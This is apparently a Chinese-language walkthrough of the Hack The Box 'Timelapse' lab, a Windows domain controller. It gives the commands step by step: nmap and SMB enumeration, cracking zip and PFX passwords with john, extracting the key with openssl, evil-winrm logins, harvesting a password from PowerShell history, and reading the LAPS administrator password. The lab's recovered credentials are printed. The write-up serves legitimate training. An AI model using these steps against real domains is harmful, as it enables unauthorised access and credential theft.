知识点:带密码pfx证书导出私钥和cert用于winrm;powershell历史记录敏感信息暴露;LAPS;
Scan
sudo nmap -sT --min-rate 10000 -p- 10.129.227.113 -oA nmapscan/ports这里导出之后grep open nmapscan/ports.nmap |awk -F '/' '{print $1}' 用nmap格式打开并以/为分隔符打印grep open nmapscan/ports.nmap |awk -F '/' '{print $1}' |paste -sd ',' 参数s指去除换行,参数d用逗号分隔ports=$(grep open nmapscan/ports.nmap |awk -F '/' '{print $1}' |paste -sd ',')echo $ports 这里存入变量sudo nmap -sT -sV -sC -O -p$ports 10.129.216.222 这里$ports输入完后按tab会显示出所有端口一般开放88kerberos 135 139 445 有dns服务和rpc服务 可以确定是域控0xdf说:这种端口组合(Kerberos + LDAP + DNS + SMB)表明它可能是域控制器。
┌──(kali㉿kali)-[~/Desktop/htb/timelapse]└─$ sudo nmap -sT -sV -sC -O -p$ports 10.129.227.113Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-12 06:39 EDTNmap scan report for 10.129.227.113Host is up (0.29s latency).PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-12 13:22:22Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open ldapssl?5986/tcp open wsmans?| ssl-cert: Subject: commonName=dc01.timelapse.htb| Not valid before: 2021-10-25T14:05:29|_Not valid after: 2022-10-25T14:25:29| tls-alpn:|_ http/1.1|_ssl-date: 2023-10-12T13:24:39+00:00; +2h43m01s from scanner time.9389/tcp open tcpwrapped49667/tcp open unknown49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.049674/tcp open msrpc Microsoft Windows RPC49696/tcp open msrpc Microsoft Windows RPC59908/tcp open msrpc Microsoft Windows RPCWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: printer|broadband router|media device|router|print server|WAP|specializedRunning (JUST GUESSING): Ricoh embedded (89%), OneAccess embedded (88%), Sony embedded (88%), HP embedded (86%), Linksys embedded (86%), Brother embedded (86%), Novatel embedded (86%)OS CPE: cpe:/h:ricoh:aficio_sp_c210sf cpe:/h:oneaccess:1641 cpe:/h:sony:bravia_kdl-32v5500 cpe:/h:hp:laserjet_4250 cpe:/h:brother:nc-130h cpe:/h:brother:hl-2070n cpe:/h:novatel:mifi_2200_3g cpe:/h:sony:fwd-40lx2fAggressive OS guesses: Ricoh Aficio SP C210SF printer (89%), OneAccess 1641 router (88%), Sony Bravia V5500-series TV (88%), Sony Bravia W5500-series TV (88%), HP LaserJet 4250 printer (86%), Linksys BEFSR41 EtherFast router (86%), Brother NC-130h print server (86%), Brother HL-2070N printer (86%), Brother HL-5070N printer (86%), Brother MFC-7820N printer (86%)No exact OS matches for host (test conditions non-ideal).Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: 2h42m58s, deviation: 2s, median: 2h42m56s| smb2-time:| date: 2023-10-12T13:23:53|_ start_date: N/A| smb2-security-mode:| 311:|_ Message signing enabled and requiredOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 197.03 seconds
Enum
windows一般一开始先枚举samba服务,使用smbmap
smbmap -H timelapse.htb 若发现unknow 进一步枚举guest用户
smbmap -H timelapse.htb -u guest
NETLOGON和SYSVOL一般是域控的标准配置,ADMIN$,C$,IPC$一般管理员权限才能访问。shares就是用户自定义的共享了,这边可以用-R参数列出所有可读共享
smbmap -H timelapse.htb -u guest -R
smbmap枚举后可以用smbclient客户端来访问
smbclient //timelapse.htb/shares
prompt是取消确认提示
提一嘴在此之前我还用了crackmapexec查看smb可以发现(name:DC01) (domain:timelapse.htb) (signing:True),不知道为什么nmap并没给我详细信息。
┌──(kali㉿kali)-[~/Desktop/htb/timelapse]└─$ crackmapexec smb 10.129.227.113SMB 10.129.227.113 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
这边拿下来doc好像没什么用,主要提示了LAPS。zip是一个带密码的压缩包,john爆破即可。解完拿到pfx。
Obtain Keys
这边的pfx是带密码的,本来想用certipy打的,但是发现失败了,还是得老老实实用openssl。
这里有篇很不错的文章:https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file
┌──(kali㉿kali)-[~/Desktop/htb/timelapse]└─$ pfx2john legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash这里用rockyou爆破即可
得:thuglegacy
┌──(kali㉿kali)-[~/Desktop/htb/timelapse]└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-encEnter Import Password:Enter PEM pass phrase:Verifying - Enter PEM pass phrase:┌──(kali㉿kali)-[~/Desktop/htb/timelapse]└─$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.keyEnter pass phrase for legacyy_dev_auth.key-enc:writing RSA key┌──(kali㉿kali)-[~/Desktop/htb/timelapse]└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crtEnter Import Password:
接下来使用evil-winrm即可;这里-S参数是由于证书一般需SSL认证
evil-winrm -i 10.129.227.113 -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crtlateral movement
net user legacyyUser name legacyyFull Name LegacyyCommentcommentcode 000 (System Default)Account active YesAccount expires NeverPassword last set 10/23/2021 12:17:10 PMPassword expires NeverPassword changeable 10/24/2021 12:17:10 PMPassword required YesUser may change password YesWorkstations allowed AllLogon scriptUser profileHome directoryLast logon 6/30/2022 6:52:32 PMLogon hours allowed AllLocal Group Memberships *Remote Management UseGlobal Group memberships *Domain Users *DevelopmentThe command completed successfully.
我们发现它处于*Development也就是开发组,那么可以猜测他的powershell记录可能有敏感信息。
https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html
type C:UserslegacyyAppDataRoamingMicrosoftWindowsPowerShellPSReadLineConsoleHost_history.txt得whoamiipconfig /allnetstat -ano |select-string LIST$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}get-aduser -filter * -properties *exit
发现账户和密码,横向移动
evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -SROOT
net user svc_deployUser name svc_deployFull Name svc_deployCommentcommentcode 000 (System Default)Account active YesAccount expires NeverPassword last set 10/25/2021 12:12:37 PMPassword expires NeverPassword changeable 10/26/2021 12:12:37 PMPassword required YesUser may change password YesWorkstations allowed AllLogon scriptUser profileHome directoryLast logon 10/25/2021 12:25:53 PMLogon hours allowed AllLocal Group Memberships *Remote Management UseGlobal Group memberships *LAPS_Readers *Domain UsersThe command completed successfully.
LAPS_Readers说明svc_deploy 有权从 LAPS 读取数据。
https://0xdf.gitlab.io/2021/11/06/htb-pivotapi.html#get-laps-password
DC01 -property 'ms-mcs-admpwd'或DC01 -property *得重点内容:DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htbDNSHostName : dc01.timelapse.htbEnabled : True: uM[3va(s870g6Y]9i]6tMu{jName : DC01ObjectClass : computerObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98fSamAccountName : DC01$SID : S-1-5-21-671920749-559770252-3318990721-1000UserPrincipalName :
拿到root密码,横向即可。
evil-winrm -i 10.129.227.113 -S -u administrator -p 'uM[3va(s870g6Y]9i]6tMu{j'原文始发于微信公众号(搁浅安全):HTB-Timelapse(Easy)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论